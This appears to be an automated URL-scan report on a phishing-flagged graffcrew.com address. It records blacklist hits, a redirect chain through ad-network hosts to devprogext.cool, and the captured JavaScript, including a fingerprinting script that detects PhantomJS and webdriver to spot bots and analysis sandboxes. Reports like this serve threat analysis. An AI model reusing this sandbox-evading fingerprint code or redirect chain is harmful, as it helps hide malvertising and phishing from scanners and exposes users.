Overview

URL graffcrew.com/doc/US_us/STATUS/INV37257208762875
IP5.39.34.85
ASNAS16276 OVH SAS
Location France
Report completed2018-08-21 03:53:23 CEST
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2018-08-21 2 graffcrew.com/doc/US_us/STATUS/INV37257208762875 Phishing
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 5.39.34.85

Date UQ / IDS / BL URL IP
2018-09-03 11:49:28 +0200
0 - 2 - 2 graffcrew.com/83248TCVRUE/PAYROLL/Commercial/ 5.39.34.85
2018-08-21 10:55:07 +0200
0 - 0 - 1 graffcrew.com 5.39.34.85

Last 10 reports on ASN: AS16276 OVH SAS

Date UQ / IDS / BL URL IP
2018-11-19 04:44:00 +0100
0 - 0 - 1 tv.negrestempestes.cat/ 176.31.172.131
2018-11-19 03:39:01 +0100
0 - 0 - 1 mercur.com.uy/ 198.50.193.48
2018-11-19 03:17:26 +0100
0 - 0 - 1 phene.fr/ 178.33.135.90
2018-11-19 01:53:52 +0100
0 - 5 - 0 developus.tk/ 94.23.202.102
2018-11-19 00:52:51 +0100
0 - 1 - 0 cultivaroser.xyz/ 188.165.253.55
2018-11-19 00:28:26 +0100
0 - 0 - 1 setstat.ru/api/savePostback?token=neTouLzMl2 178.32.30.51
2018-11-18 23:56:12 +0100
0 - 0 - 0 ahrefs.com 151.80.39.61
2018-11-18 23:52:31 +0100
0 - 3 - 0 www.insurancefunda.tk/ 192.99.3.147
2018-11-18 23:45:01 +0100
0 - 0 - 1 www.hentairider.com/dead-rising-2-hentai/ 91.121.9.128
2018-11-18 23:30:37 +0100
0 - 0 - 0 utv3.us 158.69.63.110

Last 2 reports on domain: graffcrew.com

Date UQ / IDS / BL URL IP
2018-09-03 11:49:28 +0200
0 - 2 - 2 graffcrew.com/83248TCVRUE/PAYROLL/Commercial/ 5.39.34.85
2018-08-21 10:55:07 +0200
0 - 0 - 1 graffcrew.com 5.39.34.85


JavaScript

Executed Scripts (9)


Executed Evals (2)

#1 JavaScript::Eval (size: 5318, repeated: 1) - SHA256: a6a76a343c867c0e8b0ef6339c7fec48580bc2c1e6c0ce80cd805151f90ad6f4

                                        function QCDone(d) {
    try {
        document.getElementById('ci_SW').value = d.SW
    } catch (e) {}
    try {
        document.getElementById('ci_SH').value = d.SH
    } catch (e) {}
    try {
        document.getElementById('ci_SAH').value = d.SAH
    } catch (e) {}
    try {
        document.getElementById('ci_WX').value = d.WX
    } catch (e) {}
    try {
        document.getElementById('ci_WY').value = d.WY
    } catch (e) {}
    try {
        document.getElementById('ci_WW').value = d.WW
    } catch (e) {}
    try {
        document.getElementById('ci_WH').value = d.WH
    } catch (e) {}
    try {
        document.getElementById('ci_CW').value = d.CW
    } catch (e) {}
    try {
        document.getElementById('ci_WIW').value = d.WIW
    } catch (e) {}
    try {
        document.getElementById('ci_WIH').value = d.WIH
    } catch (e) {}
    try {
        document.getElementById('ci_WFC').value = d.WFC
    } catch (e) {}
    try {
        document.getElementById('ci_PL').value = d.PL
    } catch (e) {}
    try {
        document.getElementById('ci_DRF').value = d.DRF
    } catch (e) {}
    try {
        document.getElementById('ci_NP').value = d.NP
    } catch (e) {}
    try {
        document.getElementById('ci_PT').value = d.PT
    } catch (e) {}
    try {
        document.getElementById('ci_NB').value = d.NB
    } catch (e) {}
    try {
        document.getElementById('ci_NG').value = d.NG
    } catch (e) {}
    try {
        document.getElementById('ci_DM').value = d.DM
    } catch (e) {}
    try {
        document.getElementById('ci_CF').value = d.CF
    } catch (e) {}
    try {
        document.getElementById('ci_NW').value = d.NW
    } catch (e) {}
    try {
        document.getElementById('ci_HIL').value = d.HIL
    } catch (e) {}
}
var QC = {};
try {
    QC.SW = window.screen.width;
    QC.SH = window.screen.height
} catch (e) {
    QC.SW = -1;
    QC.SH = -1
}
try {
    QC.SAH = window.screen.availHeight
} catch (e) {
    QC.SAH = -1
}
try {
    QC.WX = window.screenX;
    QC.WY = window.screenY
} catch (e) {
    QC.WX = -1;
    QC.WY = -1
}
try {
    QC.WW = window.outerWidth;
    QC.WH = window.outerHeight
} catch (e) {
    QC.WW = -1;
    QC.WH = -1
}
try {
    QC.WIW = window.innerWidth;
    QC.WIH = window.innerHeight
} catch (e) {
    QC.WIW = -1;
    QC.WIH = -1
}
try {
    QC.CW = document.documentElement.clientWidth
} catch (e) {
    QC.CW = -1
}
try {
    QC.WFC = window.top.frames.length
} catch (e) {
    QC.WFC = -1
}
try {
    QC.PL = document.location.href
} catch (e) {
    QC.PL = ''
}
try {
    QC.DRF = document.referrer
} catch (e) {
    QC.DRF = ''
}
try {
    QC.NP = (!(navigator.plugins instanceof PluginArray) || navigator.plugins.length == 0) ? 0 : 1
} catch (e) {
    QC.NP = -1
}
try {
    QC.PT = window.callPhantom !== undefined || window._phantom !== undefined ? 1 : 0
} catch (e) {
    QC.PT = -1
}
try {
    QC.NB = typeof navigator.sendBeacon === "function" ? 1 : 0
} catch (e) {
    QC.NB = -1
}
try {
    QC.NG = navigator.geolocation !== undefined ? 1 : 0
} catch (e) {
    QC.NG = -1
}
try {
    QC.NW = 'webdriver' in navigator ? 1 : 0
} catch (e) {
    QC.NW = -1
}
QC.CF = 0;
try {
    var FlashDetect = new function() {
        var self = this;
        self.installed = false;
        self.raw = "";
        self.major = -1;
        self.minor = -1;
        self.revision = -1;
        self.revisionStr = "";
        var activeXDetectRules = [{
            "name": "ShockwaveFlash.ShockwaveFlash.7",
            "version": function(obj) {
                return getActiveXVersion(obj)
            }
        }, {
            "name": "ShockwaveFlash.ShockwaveFlash.6",
            "version": function(obj) {
                var version = "6,0,21";
                try {
                    obj.AllowScriptAccess = "always";
                    version = getActiveXVersion(obj)
                } catch (err) {}
                return version
            }
        }, {
            "name": "ShockwaveFlash.ShockwaveFlash",
            "version": function(obj) {
                return getActiveXVersion(obj)
            }
        }];
        var getActiveXVersion = function(activeXObj) {
            var version = -1;
            try {
                version = activeXObj.GetVariable("\$version")
            } catch (err) {}
            return version
        };
        var getActiveXObject = function(name) {
            var obj = -1;
            try {
                obj = new ActiveXObject(name)
            } catch (err) {
                obj = {
                    activeXError: true
                }
            }
            return obj
        };
        var parseActiveXVersion = function(str) {
            var versionArray = str.split(",");
            return {
                "raw": str,
                "major": parseInt(versionArray[0].split(" ")[1], 10),
                "minor": parseInt(versionArray[1], 10),
                "revision": parseInt(versionArray[2], 10),
                "revisionStr": versionArray[2]
            }
        };
        var parseStandardVersion = function(str) {
            var descParts = str.split(/ +/);
            var majorMinor = descParts[2].split(/\./);
            var revisionStr = descParts[3];
            return {
                "raw": str,
                "major": parseInt(majorMinor[0], 10),
                "minor": parseInt(majorMinor[1], 10),
                "revisionStr": revisionStr,
                "revision": parseRevisionStrToInt(revisionStr)
            }
        };
        var parseRevisionStrToInt = function(str) {
            return parseInt(str.replace(/[a-zA-Z]/g, ""), 10) || self.revision
        };
        self.majorAtLeast = function(version) {
            return self.major >= version
        };
        self.minorAtLeast = function(version) {
            return self.minor >= version
        };
        self.revisionAtLeast = function(version) {
            return self.revision >= version
        };
        self.versionAtLeast = function(major) {
            var properties = [self.major, self.minor, self.revision];
            var len = Math.min(properties.length, arguments.length);
            for (i = 0; i < len; i++) {
                if (properties[i] >= arguments[i]) {
                    if (i + 1 < len && properties[i] == arguments[i]) {
                        continue
                    } else {
                        return true
                    }
                } else {
                    return false
                }
            }
        };
        self.FlashDetect = function() {
            if (navigator.plugins && navigator.plugins.length > 0) {
                var type = 'application/x-shockwave-flash';
                var mimeTypes = navigator.mimeTypes;
                if (mimeTypes && mimeTypes[type] && mimeTypes[type].enabledPlugin && mimeTypes[type].enabledPlugin.description) {
                    var version = mimeTypes[type].enabledPlugin.description;
                    var versionObj = parseStandardVersion(version);
                    self.raw = versionObj.raw;
                    self.major = versionObj.major;
                    self.minor = versionObj.minor;
                    self.revisionStr = versionObj.revisionStr;
                    self.revision = versionObj.revision;
                    self.installed = true
                }
            } else if (navigator.appVersion.indexOf("Mac") == -1 && window.execScript) {
                var version = -1;
                for (var i = 0; i < activeXDetectRules.length && version == -1; i++) {
                    var obj = getActiveXObject(activeXDetectRules[i].name);
                    if (!obj.activeXError) {
                        self.installed = true;
                        version = activeXDetectRules[i].version(obj);
                        if (version != -1) {
                            var versionObj = parseActiveXVersion(version);
                            self.raw = versionObj.raw;
                            self.major = versionObj.major;
                            self.minor = versionObj.minor;
                            self.revision = versionObj.revision;
                            self.revisionStr = versionObj.revisionStr
                        }
                    }
                }
            }
        }()
    };
    if (FlashDetect.major > 0) {
        QC.CF = 1
    }
} catch (e) {
    QC.CF = 2
}
try {
    QCDone(QC)
} catch (e) {
    console.log(e)
}
                                    

#2 JavaScript::Eval (size: 613, repeated: 1) - SHA256: 7d79d7f17504a461320f713188b82fa5a1fdfd154969db17892e75294035c861

                                        var a;
var b;
var ix;
if (typeof window.innerWidth != 'undefined') {
    a = window.innerWidth;
    b = window.innerHeight
} else if (typeof document.documentElement != 'undefined' && typeof document.documentElement.clientWidth != 'undefined' && document.documentElement.clientWidth != 0) {
    a = document.documentElement.clientWidth;
    b = document.documentElement.clientHeight
} else {
    a = document.getElementsByTagName('body')[0].clientWidth;
    b = document.getElementsByTagName('body')[0].clientHeight
}
try {
    ix = window.self !== window.top ? 1 : 0
} catch (e) {
    ix = 2
}
document.getElementById('a').value = a;
document.getElementById('b').value = b;
document.getElementById('ix').value = ix;
                                    

Executed Writes (0)



HTTP Transactions (23)


Request Response
                                        
                                            GET /doc/US_us/STATUS/INV37257208762875 HTTP/1.1 
Host: graffcrew.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         5.39.34.85
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.26
Set-Cookie: http_uid_utm=1; expires=Thu, 23-Aug-2018 01:52:51 GMT
Location: https://go.pub2srv.com/afu.php?zoneid=1938926
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   20
Md5:    7029066c27ac6f5ef18d660d5741979a
Sha1:   46c6643f07aa7f6bfe7118de926b86defc5087c4
Sha256: 59869db34853933b239f1e2219cf7d431da006aa919635478511fabbfc8849d2

Alerts:
  Blacklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: gs.symcd.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         23.43.139.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx/1.12.2
Content-Length: 1425
Content-Transfer-Encoding: binary
Cache-Control: max-age=543198, public, no-transform, must-revalidate
Last-Modified: Mon, 20 Aug 2018 08:46:07 GMT
Expires: Mon, 27 Aug 2018 08:46:07 GMT
Date: Tue, 21 Aug 2018 01:52:49 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1425
Md5:    741284e70173ce1dd5b83e0be7f98add
Sha1:   b0b5b15e67dd74a04913b28393ecba7407745ff0
Sha256: 68a704150cfb7c29d6d56d773bebe989d361ea60281636ced4f1f8023af8b0d7
                                        
                                            GET /afu.php?zoneid=1938926 HTTP/1.1 
Host: go.pub2srv.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         188.72.202.220
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:49 GMT
Content-Length: 154
Connection: keep-alive
Location: https://cobalten.com/afu.php?zoneid=1938926
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *


--- Additional Info ---
Magic:  HTML document text
Size:   154
Md5:    cfbeaf604823f038b8b46f0ac862b98c
Sha1:   7b9eb1dac48e74fa5f418bc456cb410f88b81d98
Sha256: 20c1ab602462b7fc0d5b4cbd555cacf127b69a07a737579598ebcbc0f5b21319
                                        
                                            POST / HTTP/1.1 
Host: status.rapidssl.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=153135
Date: Tue, 21 Aug 2018 01:52:50 GMT
Etag: "5b7ae398-1d7"
Expires: Wed, 22 Aug 2018 20:10:00 GMT
Last-Modified: Mon, 20 Aug 2018 15:51:52 GMT
Server: ECS (arn/4692)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    d4072c2faf05d5196ba218d19b5c9bd0
Sha1:   b2a2942f0d0c179996a208c8d36af06aae7bb76f
Sha256: 5bb6fc76636d2c301db497f0df579bb9ba3d09af859cc070231517c4ccf46adf
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=167289
Date: Tue, 21 Aug 2018 01:52:50 GMT
Etag: "5b7b37ee-1d7"
Expires: Thu, 23 Aug 2018 00:20:25 GMT
Last-Modified: Mon, 20 Aug 2018 21:51:42 GMT
Server: ECS (arn/45E2)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    6803e2c24fb8d238b7d06608d4230fa4
Sha1:   0fe5b0c07b3529f53142b7afbcf083aeda0ae23a
Sha256: 6ad002c4194322e50e025a0e9d290016076c9eca2a49c8f4472b0e851689ae4f
                                        
                                            GET /afu.php?zoneid=1938926 HTTP/1.1 
Host: cobalten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         188.42.162.184
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:50 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Timing-Allow-Origin: *, *
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: SeenToday=1; expires=Wed, 22-Aug-2018 01:52:50 GMT; Max-Age=86400; path=/ OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; expires=Wed, 22-Aug-2018 01:52:50 GMT; Max-Age=86400; path=/ oaidts=1534816370; expires=Wed, 21-Aug-2019 01:52:50 GMT; Max-Age=31536000; path=/ OAID=f8e2341405ecc01afe038fc56b44a136; expires=Wed, 21-Aug-2019 01:52:50 GMT; Max-Age=31536000; path=/ OAID=f8e2341405ecc01afe038fc56b44a136; expires=Wed, 21-Aug-2019 01:52:50 GMT; Max-Age=31536000; path=/ OFR=%7B%2230265%22%3A1%7D; expires=Fri, 16-Aug-2019 01:52:50 GMT; Max-Age=31104000; path=/ exsdsf=1534816370 pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368; expires=Tue, 21-Aug-2018 02:02:50 GMT; Max-Age=600 ltm_afu=1; expires=Wed, 22-Aug-2018 01:52:50 GMT; Max-Age=86400; path=/
X-FRAME-OPTIONS: DENY
P3P: CP="CUR ADM OUR NOR STA NID"
X-Used-AdExchange: 1
Content-Encoding: gzip
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4578
Md5:    63ab291d37c055949503561e1a9441c0
Sha1:   cba115b897d7f439e92db7e95718a75758985abf
Sha256: 253ceb8df20a9497de8dd00936acb9d493451bf2dfde2fd54af14d3a7a4ad826
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: cobalten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: SeenToday=1; OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; oaidts=1534816370; OAID=f8e2341405ecc01afe038fc56b44a136; OFR=%7B%2230265%22%3A1%7D; exsdsf=1534816370; pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368; ltm_afu=1

                                         
                                         188.42.162.184
HTTP/1.1 204 No Content
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:51 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000, public, must-revalidate, proxy-revalidate
Pragma: public


--- Additional Info ---
                                        
                                            GET /?r=%2Fmb%2Fhan&zoneid=1938926&pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368&empty=0&auction_id=2803b9ab-615e-4371-bf8c-7993fca3d38e&uuid=4d45b19f-ecda-4e48-85ab-a7ee53ec7b40&ad_scheme=1&rotation_type=3&ppucounter=0&first_visit=0&on_test=0&offer_views=1&ab_test=0&adparams=bm9qcz0w&ip=f3d5bb63c9dbdcfb475795d659c65a4e&x=1176&y=754&sw=1176&sh=885&sah=855&wx=-4&wy=-4&ww=1184&wh=863&cw=1176&wiw=1176&wih=754&wfc=0&pl=https%3A%2F%2Fcobalten.com%2Fafu.php%3Fzoneid%3D1938926&drf=&np=1&pt=0&nb=0&ng=1&dm=undefined&cf=1&nw=0&hil=undefined&id=dd276cca861b12cd7028beddc344a34b&co=1&rf=0&hs=d01d492f13aec958676a3d4656a2a36c&ix=0&fs=1&timeout=0 HTTP/1.1 
Host: cobalten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cobalten.com/afu.php?zoneid=1938926
Cookie: SeenToday=1; OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; oaidts=1534816370; OAID=f8e2341405ecc01afe038fc56b44a136; OFR=%7B%2230265%22%3A1%7D; exsdsf=1534816370; pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368; ltm_afu=1

                                         
                                         188.42.162.184
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Timing-Allow-Origin: *, *
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: f3d5bb63c9dbdcfb475795d659c65a4e=3f1HG4OdnWPOKNekIh9MuOMnhVjpwUsQT_kcDq0fUeQ; expires=Tue, 28-Aug-2018 01:52:51 GMT; Max-Age=604800 OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; expires=Wed, 22-Aug-2018 01:52:51 GMT; Max-Age=86400; path=/ ppucnt=1; expires=Wed, 22-Aug-2018 01:52:51 GMT; Max-Age=86400; path=/ ppucntstart=1534816371; expires=Wed, 22-Aug-2018 01:52:51 GMT; Max-Age=86400; path=/ allcnt=1; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/ OAID=f8e2341405ecc01afe038fc56b44a136; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/ OFR=%7B%2230265%22%3A2%7D; expires=Fri, 16-Aug-2019 01:52:51 GMT; Max-Age=31104000; path=/ _OACCAP[1283126]=1; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/ _OACBLOCK[1283126]=1534816371; expires=Thu, 20-Sep-2018 01:52:51 GMT; Max-Age=2592000; path=/ _OXCCLK[1283126]=1; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/ _OXPCLK[136588]=1; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Location: https://briefext.com/Ky0vu0/?source=1938926&external_id=55586495074930688&cost=0.15
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff


--- Additional Info ---
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca4.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Sat, 18 Aug 2018 06:39:51 GMT
Etag: 02D7F1DB0FF0B304BF75FEFA7F50544E3F105B1A
X-OCSP-Responder-ID: rmdccaocsp27
Content-Length: 279
Cache-Control: public, no-transform, must-revalidate, max-age=362270
Expires: Sat, 25 Aug 2018 06:30:41 GMT
Date: Tue, 21 Aug 2018 01:52:51 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   279
Md5:    129f20166c3691dfff4aab2cb083013e
Sha1:   02d7f1db0ff0b304bf75fefa7f50544e3f105b1a
Sha256: 26bc8f0a63c693d9dc09f09e9a3d731602b505019e032fe1628f4fb36ccc455c
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca4.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Thu, 16 Aug 2018 10:51:21 GMT
Etag: 6EFF1C68C412A7BEBF0A275E9866EFCF155599D9
X-OCSP-Responder-ID: rmdccaocsp24
Content-Length: 314
Cache-Control: public, no-transform, must-revalidate, max-age=204527
Expires: Thu, 23 Aug 2018 10:41:38 GMT
Date: Tue, 21 Aug 2018 01:52:51 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   314
Md5:    7f3eb520f9bcd1d63db61354064d4e0d
Sha1:   6eff1c68c412a7bebf0a275e9866efcf155599d9
Sha256: 80503eadfd7bfd0780bb2dafbc78e587a18281c0745fa7784fb858ba90ef47cc
                                        
                                            GET /Ky0vu0/?source=1938926&external_id=55586495074930688&cost=0.15 HTTP/1.1 
Host: briefext.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cobalten.com/afu.php?zoneid=1938926

                                         
                                         104.24.109.18
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d7dd29d3f6be9b61918d77247b527221c1534816371; expires=Wed, 21-Aug-19 01:52:51 GMT; path=/; domain=.briefext.com; HttpOnly _token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiXCJ1dWlkXzM4NjQwZmYxYWo2M2JlYWFjM3EzXzM4NjQwZmYxYWo2M2JlYWFjM3EzNWI3YjcwNzM5Nzc1MzQuMTk5OTk2MDhcIiJ9.Mvkw_qzyq0LjN6SkX3MFBreeS3mqTpUzgX3gbhJvTSA; expires=Fri, 21-Sep-2018 01:52:51 GMT; Max-Age=2678400; path=/; domain=.briefext.com 5e9ed=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjc5MlwiOjE1MzQ4MTYzNzF9LFwiY2FtcGFpZ25zXCI6e1wiNTQ2XCI6MTUzNDgxNjM3MX0sXCJ0aW1lXCI6MTUzNDgxNjM3MX0ifQ.6nVv5CTdgXuvsUmcgcQLq1shP8sVbSq46yV_YJDz4t0; expires=Fri, 21-Sep-2018 01:52:51 GMT; Max-Age=2678400; path=/; domain=.briefext.com
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Tue, 21 Aug 2018 01:52:51 GMT
Cache-Control: max-age=0
Pragma: no-cache
Location: http://devprogext.cool/3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 44d976718911427f-OSL


--- Additional Info ---
                                        
                                            GET /3/go/1938926/?csum=iDXtGHqUAmZWVDNfKZwOllJoxYrn0mX2UQ5Bbp8cofIT2U0MsI9TB7d2WuRl-GlwAM0Xnsq4NTPouufdJ0Y-ZA%2C%2C&_subid=38640ff1aj63beaac3q3&_token=uuid_38640ff1aj63beaac3q3_38640ff1aj63beaac3q35b7b7073977534.19999608 HTTP/1.1 
Host: devprogext.cool
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         104.18.44.247
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
